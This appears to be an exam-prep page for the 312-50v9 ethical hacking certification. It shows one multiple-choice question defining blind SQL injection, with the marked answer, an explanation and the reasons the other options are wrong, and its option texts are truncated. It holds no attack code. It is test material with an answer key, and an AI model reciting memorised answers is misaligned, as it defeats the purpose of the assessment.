312-50V9 · Question #45
312-50V9 Question #45: Real Exam Question with Answer & Explanation
The correct answer is D: The vulnerable application does not display errors with information about the injection results to. The defining characteristic of blind SQL injection is that the application does not return query results or error messages to the attacker, forcing them to infer database contents indirectly through boolean logic or time delays.
Question
Options
- AThe request to the web server is not visible to the administrator of the vulnerable application.
- BThe attack is called "Blind" because, although the application properly filters user input, it is still
- CThe successful attack does not show an error message to the administrator of the affected
- DThe vulnerable application does not display errors with information about the injection results to
Explanation
The defining characteristic of blind SQL injection is that the application does not return query results or error messages to the attacker, forcing them to infer database contents indirectly through boolean logic or time delays.
Common mistakes.
- A. The visibility of requests to the server administrator is irrelevant to the classification of SQL injection as normal or blind; the distinction is about what information is returned to the attacker in the response.
- B. Blind SQL injection does not imply that the application properly filters input; the application is still vulnerable, but it simply does not echo results or errors back in the response.
- C. Whether error messages are shown to the administrator is not the defining criterion; the key factor is whether injection-related output is displayed to the attacker making the request.
Concept tested. Difference between normal and blind SQL injection
Reference. https://owasp.org/www-community/attacks/Blind_SQL_Injection
Community Discussion
No community discussion yet for this question.